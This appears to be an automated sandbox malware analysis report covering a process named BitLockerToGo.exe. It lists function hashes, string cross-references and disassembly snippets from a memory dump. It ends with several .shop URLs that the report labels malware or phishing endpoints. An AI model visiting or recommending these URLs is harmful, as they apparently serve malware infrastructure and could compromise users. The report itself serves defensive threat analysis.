Opcode ID: b00cced5009ee70bc796789a3b2a966c912c2a7350d2fe1268083fd6ba09f3f5
Instruction ID: 5591ff0dbe7c549fd0af35e5a02bb3a559060dd2593b3f7b076c4913e7cc38e1
Opcode Fuzzy Hash: b00cced5009ee70bc796789a3b2a966c912c2a7350d2fe1268083fd6ba09f3f5
Instruction Fuzzy Hash: AEB1D0706093809BD324CF58D594B9FFBE1AF86B08F14881EE48997252E3789C45DB6B

Function 00407870 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 004079A6

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: a6e8e75ce764ba58f216cc51c45b97ed7bd042e6b46cfdcb112312f18e5ac3c6
Instruction ID: cf104870c20944ac9730f797fc5b56dce8b60121415d4c6007d167e511d32dbb
Opcode Fuzzy Hash: a6e8e75ce764ba58f216cc51c45b97ed7bd042e6b46cfdcb112312f18e5ac3c6
Instruction Fuzzy Hash: E2B1497160C3819FD321CF18C88061BFBE0AFA9704F444A2DE5D997382D635EA18CBA7

Function 004214E0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 004216DE

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: b6d02c620652c496408cbc267ce8d424b63f3f8488ff8875bb7983690877b963
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 74713632B083215BD714CE28E48031FB7E2ABE5750FA9856FE4958B3A4D338DD45878A

Function 004272F1 Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

*-xG, xrefs: 004273E2

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: *-xG
API String ID: 0-3506463288
Opcode ID: c2c32d66e7cbf171f0db6f3698df62ae15f21f184dfd54c4a1125acc9fb15123
Instruction ID: 9885b9b4b067a18f401cd9f980fa97b1e982dd47f07cf5870f1a91220c7b8568
Opcode Fuzzy Hash: c2c32d66e7cbf171f0db6f3698df62ae15f21f184dfd54c4a1125acc9fb15123
Instruction Fuzzy Hash: 7541E53010CBA18AD325CB38D0543A7FFE2AF66304F98599EC8E74B392C7796446C769

Function 00438280 Relevance: 1.4, Strings: 1, Instructions: 150COMMON

Download Yara Rule

Strings

@, xrefs: 0043833E

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: a27299d4649556ccf1ab2b6d31f1e6ddec5d71aa9f7d028660f3fe0fecb50bda
Instruction ID: 829531502c2cd7b408cc448ae50e5ecfebb6b1452b217bd89706ded80ac44e5e
Opcode Fuzzy Hash: a27299d4649556ccf1ab2b6d31f1e6ddec5d71aa9f7d028660f3fe0fecb50bda
Instruction Fuzzy Hash: 864104715083018BC704DF14C89466BF7F5EFD9328F14962DE99A973A1E739D904CB8A

Function 00438830 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

@, xrefs: 00438880

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: cb5b1e248262a1685d6a1ddc28cfcc5e0ca71a6a680b0321065331f16e246c90
Instruction ID: 117bc3bb7b13d3d55cd6f96a4bfe5cdb821623e9643f4725b9f55d642e66b32d
Opcode Fuzzy Hash: cb5b1e248262a1685d6a1ddc28cfcc5e0ca71a6a680b0321065331f16e246c90
Instruction Fuzzy Hash: 9B3131B55083019BD310DF08C880A2BFBF5EFDA324F55991EE98497350D339E8488BAB

Function 00408F70 Relevance: .8, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a2e04e6f55ae4a9d795619ef932afdac085464c6a0ef44425c94ca93e535e90
Instruction ID: c61377da1eceda1aeb93717dc9e8314c127f9a799e15c577b47a9a43bc081d48
Opcode Fuzzy Hash: 7a2e04e6f55ae4a9d795619ef932afdac085464c6a0ef44425c94ca93e535e90
Instruction Fuzzy Hash: 5C52B0316183118BC725DF18E8802ABB3E1FFC4314F29893ED996A7386D739AD51CB46

Function 00404570 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6448f8c67a5073ecb89120814da4d0a659c8f20e6c9704e9758eb93e8568b6dc
Instruction ID: 398dbe7a4742a9aff6a0c493239ffc047e14f71348ce83ecddd2a6c790eb2daf
Opcode Fuzzy Hash: 6448f8c67a5073ecb89120814da4d0a659c8f20e6c9704e9758eb93e8568b6dc
Instruction Fuzzy Hash: A352ACB55087429FC314CF29C08066AF7E1BFC9314F188A7EE999A7781D338E955CB89

Function 00401EE5 Relevance: .6, Instructions: 627COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddfebe29cd32a21a3b625fb9d28a922657147c46fb14087bc63bceb82e9577ac
Instruction ID: 70f65e85518c7ab4f66c4f88abae733024392537a44d5231c64fd5a54c3fdde3
Opcode Fuzzy Hash: ddfebe29cd32a21a3b625fb9d28a922657147c46fb14087bc63bceb82e9577ac
Instruction Fuzzy Hash: B232027691C291CFE7088F24E86236A7BE2EBD5345F0998BDD09907291C338D666CB45

Function 00404FD0 Relevance: .6, Instructions: 626COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cfe81156ce9eaf54bebc5e5db4b0a24aabb0d0e851b6ffc52315e43c1419e26
Instruction ID: 406b601d49ef01c2f125bab37eda7f5fd94fc38f84b8454ceb14e9b34ab3e70b
Opcode Fuzzy Hash: 9cfe81156ce9eaf54bebc5e5db4b0a24aabb0d0e851b6ffc52315e43c1419e26
Instruction Fuzzy Hash: C6421571614B108FC328CE29C59462BBBF2FF85310B944A2ED69797B90D77AB845CF18

Function 00401E3A Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8de11c755fc7ebbf551cf5b064619deec7cf4345871906ec1ad96e6b04595760
Instruction ID: 683d7174eb80e52c98d176b72fc80695823521f5397be7989face2367189cfb0
Opcode Fuzzy Hash: 8de11c755fc7ebbf551cf5b064619deec7cf4345871906ec1ad96e6b04595760
Instruction Fuzzy Hash: 7432137A91C291CFE7088F24E86236A7BE2FBD5345F0998BDD0C947291C338D666CB45

Function 00434650 Relevance: .6, Instructions: 604COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a36b975db6d7cd604bbe8b920a24fec00871bb265c46cef346e24dfc2ad44fa6
Instruction ID: 1bc9439d3594ebe8011adbc58173ce5bfe01fa2db65c91ffb486f56ebe290b41
Opcode Fuzzy Hash: a36b975db6d7cd604bbe8b920a24fec00871bb265c46cef346e24dfc2ad44fa6
Instruction Fuzzy Hash: 3D129B742083419FC314DF18D890B6FBBE1BBC9314F149A2EE5958B391D379E845CB9A

Function 004071F0 Relevance: .6, Instructions: 560COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4bfc9005fab0e7e433c1a2028922f08d8221a3023096e001785c008543b0964
Instruction ID: 60cea35eb3d6fa61f357504584feb91c60b947cec8cfa7dfdfcaf3524d7ed838
Opcode Fuzzy Hash: c4bfc9005fab0e7e433c1a2028922f08d8221a3023096e001785c008543b0964
Instruction Fuzzy Hash: AC12163664C3008FC714DF29C88166BFBE6EFD9304F08896EE585973A1D679E805CB56

Function 0041D620 Relevance: .4, Instructions: 379COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 68440b3918ebe4959b33d326de1f540a38f96f4345424a0452fab1f8cdd6c2eb
Instruction ID: 6f8a57a0df096553feeaf5f79ad2d9b94b2cc717e98c62d34242f84b0698bdcd
Opcode Fuzzy Hash: 68440b3918ebe4959b33d326de1f540a38f96f4345424a0452fab1f8cdd6c2eb
Instruction Fuzzy Hash: 03B1D1B1A083418BD714DF18C880B6BB7E2EF95354F14492EE5D58B392E339DC85CB9A

Function 00438F30 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ee2897d6c126f96dd00e062a06d29ab08c8b679543ae2ad238f070e800e71dc
Instruction ID: e5dd8c63c4c2310be347cfde7108a023f1d138f471b7f13295cc3581e40010c9
Opcode Fuzzy Hash: 3ee2897d6c126f96dd00e062a06d29ab08c8b679543ae2ad238f070e800e71dc
Instruction Fuzzy Hash: 0291CC346083028BD714DF18C880A2BB3F2EF89750F18992DE8859B361E779EC51CB96

Function 00438C40 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d301f5cd76658fd169ad6a9e2deab9424837572c19609187ec94c00444b3c904
Instruction ID: 663c5bcd9b56b2e2c5df0010fdccdd558ea5eeb94861614ca9224f26a76094a4
Opcode Fuzzy Hash: d301f5cd76658fd169ad6a9e2deab9424837572c19609187ec94c00444b3c904
Instruction Fuzzy Hash: 9E81CE756083128BD718DF08D49092BF7B2EFD9710F19992DF98197361EB38AC41CB9A

Function 0041F5DB Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 166116ce4af1e596eea8db9a009f735dd5fd69f5eb0289d5c26e316c25cf094a
Instruction ID: eff40d3f760392520e2e31117415e32046750233f4c9eb03c92380af3f96b233
Opcode Fuzzy Hash: 166116ce4af1e596eea8db9a009f735dd5fd69f5eb0289d5c26e316c25cf094a
Instruction Fuzzy Hash: 3A71A9716087024FC718CF28C85066AB7E2AFC9314F19863EE46AD73D5EB34E946CB95

Function 0042F940 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 418db28eabb71052999be4ffbc2f7dff514fdb1bf58f0368a28cf0c385cb4bcf
Instruction ID: 9e518e164869ca4cf7cd41e648136a1d44e6f73f59032028176a96171d5bcab2
Opcode Fuzzy Hash: 418db28eabb71052999be4ffbc2f7dff514fdb1bf58f0368a28cf0c385cb4bcf
Instruction Fuzzy Hash: B26180B16087548FD314DF29D89435BBBE1BB88318F544A3EE4D987350E379D9088F86

Function 0040EBD3 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da80a1a2809f04e51407e14fa42fabcf9fe6a64b7c1de7dd673b3af13e222051
Instruction ID: 255ec6f79de5feb84556a0d246edf1ad3205a3bae726bbac10c0dc8f6fa70436
Opcode Fuzzy Hash: da80a1a2809f04e51407e14fa42fabcf9fe6a64b7c1de7dd673b3af13e222051
Instruction Fuzzy Hash: BE5147701193809BD3148F25D595B6FFBF1EF85709F148C2EE88897291D339D815DB1A

Function 0040D620 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a02c49bd0757aa5bc734b5e05adfcdfa95a84cf489fec3779b3473359c1d5a8
Instruction ID: 283e8bbf4060da9ff904c7b8d1d5b7e167d15358b364fbfec554c59609fcbd45
Opcode Fuzzy Hash: 9a02c49bd0757aa5bc734b5e05adfcdfa95a84cf489fec3779b3473359c1d5a8
Instruction Fuzzy Hash: D5412673B186910FC3088A79885023ABBD29BCA320F1A873EF4A9C73D1E639C9559755

Function 00430BD0 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 904fa98dc2a41ce23e9405ce6ccc7777338fcfaef99c0e765f72d9fbd7f2e67a
Instruction ID: 5c34b291441c6704cefff71e43429f5460f444abafbc9404149ec7cf8290b1ff
Opcode Fuzzy Hash: 904fa98dc2a41ce23e9405ce6ccc7777338fcfaef99c0e765f72d9fbd7f2e67a
Instruction Fuzzy Hash: 8D310972E045244BD7149D798CA026FBB62BB89334F29933EED765B3C1D6785C0683C6

Function 00438430 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 830c15aff703157d2725b1c17b2436fc874817aca95b4460cad1f7b981ceab47
Instruction ID: 40909ec1317c17d41547704b5bdcf506bf710a3df10c3ab971f439353438fa4d
Opcode Fuzzy Hash: 830c15aff703157d2725b1c17b2436fc874817aca95b4460cad1f7b981ceab47
Instruction Fuzzy Hash: 19218970608302ABD714CF04C984A6BFBE2EBDA715F14991EF48497341E734ED40CB9A

Function 004041D0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d54eb38b3d21a02e7991f73f2fcecda693e1d2284c94b2f0e249a6e4ed0d203d
Instruction ID: 7a37ccaacb69e8dac2b6d06870eaf221d7dec97e1dcc1e1fc4a2ff6fa8a3edf7
Opcode Fuzzy Hash: d54eb38b3d21a02e7991f73f2fcecda693e1d2284c94b2f0e249a6e4ed0d203d
Instruction Fuzzy Hash: AC1127B3B2566107E350DE76ACD82172393E7C535071A0179EA81E7381CA39F913E169

Function 00436622 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5411688fc63e188ee61404459632524d6712afbb060471e916132214ff6a24c4
Instruction ID: b48329eba11da2ca047e5d133636b00c97e22490b9f8d178f273e9f3b2a72457
Opcode Fuzzy Hash: 5411688fc63e188ee61404459632524d6712afbb060471e916132214ff6a24c4
Instruction Fuzzy Hash: A8216AB4508342ABD314CF04C996B2BBBF1FB9A345F14985DE0918B391D379D948CBAA

Function 0040F11C Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35d5ca7525dfcf0c480dcf44a179d9163a63929352bc58c1c630753a0d64a977
Instruction ID: 4fd291f2fbf78bbf13f2ee8993a88041a66c56933476c607e92e2c5d7a53bc3f
Opcode Fuzzy Hash: 35d5ca7525dfcf0c480dcf44a179d9163a63929352bc58c1c630753a0d64a977
Instruction Fuzzy Hash: D521D2705193809BD314CB19D59072FFBF1AF86B48F14982EE489A7281D338DC059B6B

Function 0042AD20 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: d92f37e9b298b373f0d9c58e76fe24413968fa3474f16d234330b2160051ee82
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 3E11C633B151E44FC3168D3C9400565BFA30BD3636B9D839AE8B49B2D2D6268D8A835A

Function 00420A80 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a15784cc5eb02fa2fd4c3b602e1d468b66b0e7a318d5ab0423d1158ce4ccbbad
Instruction ID: 34949ed0fc7751fac829d3635b1e11bfb9778a6ed981838df8f9cd31a49e7bd0
Opcode Fuzzy Hash: a15784cc5eb02fa2fd4c3b602e1d468b66b0e7a318d5ab0423d1158ce4ccbbad
Instruction Fuzzy Hash: 09015EB170036147DB209E55A4C1B3BA3E86FA5708F98453EE80657343DB79EC05CA99

Function 00413600 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0add140c59d4ab5fc20cc3cb2903724e0cee638e11ea733a791064fa1cf5c0cd
Instruction ID: b158c08e4e43e43c014762f9157cd9a4df288b5fa416985192e7eaf241b7638e
Opcode Fuzzy Hash: 0add140c59d4ab5fc20cc3cb2903724e0cee638e11ea733a791064fa1cf5c0cd
Instruction Fuzzy Hash: 47F05CB1E0411037DB32CD44DCC0F77BB9CCB87714F190466E84453302D1655884C3E9

Function 00428637 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01ec9996cc54b8184432945791190c688697af0da8f2d8158b17ea5ffa23d292
Instruction ID: a515c13775e90033b3c29edabfb6fc56fc24dcc5cbca4bf2604233712b3c5a47
Opcode Fuzzy Hash: 01ec9996cc54b8184432945791190c688697af0da8f2d8158b17ea5ffa23d292
Instruction Fuzzy Hash: CEF0F9B02097008FD354DF28D4A479ABBF1BF88304F11981DE4DACB781D779A548CB85

Function 00432650 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: 9d326656058075e1119341ef77f80a66a4f85801a74e92ae251728847ff84431
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: E0D05E3160862146AB688E19A505977F7F0EE8BB11F49A66FF582E3258D234DC41C2AD

Function 00420333 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20801cbae6a24e2093a37ec81c2cea344d4d00b7a1395fd4cdaad8570866704
Instruction ID: 7ff2be8e2785ac48140b47e1250ad2b8ec685d44faa61ea0557553a136bcfd4b
Opcode Fuzzy Hash: b20801cbae6a24e2093a37ec81c2cea344d4d00b7a1395fd4cdaad8570866704
Instruction Fuzzy Hash: 8EB092A9D2005087D1112B113C4383AB2340553608F04A03AF80B32243A63ED92A9C6F

Function 0041EA8C Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cf26c767e41ea85bb2049e073665143fd2f15b729adb5047f8effdd388abafd
Instruction ID: ba9b464a1538e696ea69fb75e764ec70e66d9ae66489d295b5bcc99ced4f4551
Opcode Fuzzy Hash: 6cf26c767e41ea85bb2049e073665143fd2f15b729adb5047f8effdd388abafd
Instruction Fuzzy Hash: 85B01261F0553083D5017F11380387DA1380A13208F403139F007320539A2CDA09888F

Function 004217D0 Relevance: 85.9, APIs: 2, Strings: 47, Instructions: 181
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00421819
GetSystemMetrics.USER32 ref: 00421829

Strings

d, xrefs: 00421D17
/ B, xrefs: 004219E9
*-B, xrefs: 00421B12
d, xrefs: 00421BE3
d, xrefs: 00421C67
z(B, xrefs: 00421A2B
,B, xrefs: 00421ADB
c/B, xrefs: 00421A99
d, xrefs: 00421C7D
d, xrefs: 00421E35
d, xrefs: 00421DB1
d, xrefs: 00421C25
v$B, xrefs: 00421AE6
'B, xrefs: 00421991
d, xrefs: 00421DC7
d, xrefs: 00421C0F
d, xrefs: 00421CBF
e"B, xrefs: 00421AF1
2(B, xrefs: 0042199C
d, xrefs: 00421BCD
d, xrefs: 00421CEB
d, xrefs: 00421E4B
^#B, xrefs: 00421944
!0B, xrefs: 00421ABA
d, xrefs: 00421DF3
S B, xrefs: 004218EC
d, xrefs: 00421D43
d, xrefs: 00421E09
d, xrefs: 00421D85
d, xrefs: 00421C51
d, xrefs: 00421D2D
d, xrefs: 00421D9B
d, xrefs: 00421C3B
d, xrefs: 00421CD5
G+B, xrefs: 00421965
d, xrefs: 00421BF9
?/B, xrefs: 004219BD
d, xrefs: 00421C93
d, xrefs: 00421DDD
d, xrefs: 00421BB7
d, xrefs: 00421E1F
d, xrefs: 00421D01
d, xrefs: 00421BA1
d, xrefs: 00421B8B
d, xrefs: 00421D59
d, xrefs: 00421D6F
d, xrefs: 00421CA9

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: MetricsSystem
String ID: !0B$*-B$/ B$2(B$?/B$G+B$S B$^#B$c/B$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e"B$v$B$z(B$'B$,B
API String ID: 4116985748-4104472098
Opcode ID: 1738cb6700f6638da489e56594754abcb73c9d509fd1256c2b4ecbbef855de05
Instruction ID: 67fc57d7b037b4f0cf32f6fbc67787e4b995e51687c56cd7717255523b0891b5
Opcode Fuzzy Hash: 1738cb6700f6638da489e56594754abcb73c9d509fd1256c2b4ecbbef855de05
Instruction Fuzzy Hash: CAD11AB40593C4CBE771CF10D19878BBAE5BBD4B08F118E1ED6991A250C7BA1168CF6B

Source: https://locatedblsoqp.shop/api	Avira URL Cloud: Label: malware
Source: https://locatedblsoqp.shop/	Avira URL Cloud: Label: phishing
Source: https://traineiwnqo.shop/api	Avira URL Cloud: Label: malware
Source: https://locatedblsoqp.shop/0z	Avira URL Cloud: Label: phishing
Source: https://traineiwnqo.shop/8	Avira URL Cloud: Label: malware
Source: https://separateedmsqj.shop/api	Avira URL Cloud: Label: malware
Source: https://locatedblsoqp.shop/W	Avira URL Cloud: Label: phishing
Source: https://traineiwnqo.shop/	Avira URL Cloud: Label: malware

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	2_2_00433DD2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov al, 01h	2_2_00435E33
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	2_2_00435E33
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov al, 01h	2_2_00435EF8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	2_2_00435EF8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov al, 01h	2_2_004367B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	2_2_004367B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [ecx], 625B6034h	2_2_00412054
